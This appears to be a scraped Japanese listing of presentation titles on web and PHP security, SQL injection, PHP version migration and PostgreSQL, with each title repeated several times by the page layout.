SQLインジェクション総”習”編
SQLインジェクション総”習”編SQLインジェクション総”習”編
SQLインジェクション総”習”編
 
PHP5.6からPHP7.0への移行
PHP5.6からPHP7.0への移行PHP5.6からPHP7.0への移行
PHP5.6からPHP7.0への移行
 
ソースコード検査に耐えるコードとは?
ソースコード検査に耐えるコードとは?ソースコード検査に耐えるコードとは?
ソースコード検査に耐えるコードとは?
 
経営者・マネージャーが知るべき情報セキュリティ
経営者・マネージャーが知るべき情報セキュリティ経営者・マネージャーが知るべき情報セキュリティ
経営者・マネージャーが知るべき情報セキュリティ
 
セキュアなソフトウェアアーキテクチャー
セキュアなソフトウェアアーキテクチャーセキュアなソフトウェアアーキテクチャー
セキュアなソフトウェアアーキテクチャー
 
PHPにないセキュリティ機能
PHPにないセキュリティ機能PHPにないセキュリティ機能
PHPにないセキュリティ機能
 
PHPにないセキュリティ機能
PHPにないセキュリティ機能PHPにないセキュリティ機能
PHPにないセキュリティ機能
 
PHPにないセキュリティ機能
PHPにないセキュリティ機能PHPにないセキュリティ機能
PHPにないセキュリティ機能
 
PHPカンファレンス2014セキュリティ対談資料
PHPカンファレンス2014セキュリティ対談資料PHPカンファレンス2014セキュリティ対談資料
PHPカンファレンス2014セキュリティ対談資料
 
Web担当者が知っておくべきPHPとセキュリティ
Web担当者が知っておくべきPHPとセキュリティWeb担当者が知っておくべきPHPとセキュリティ
Web担当者が知っておくべきPHPとセキュリティ
 
Postgre SQL 9.3 新機能
Postgre SQL 9.3 新機能Postgre SQL 9.3 新機能
Postgre SQL 9.3 新機能
 
Rails4 security
Rails4 securityRails4 security
Rails4 security
 

データベースセキュリティ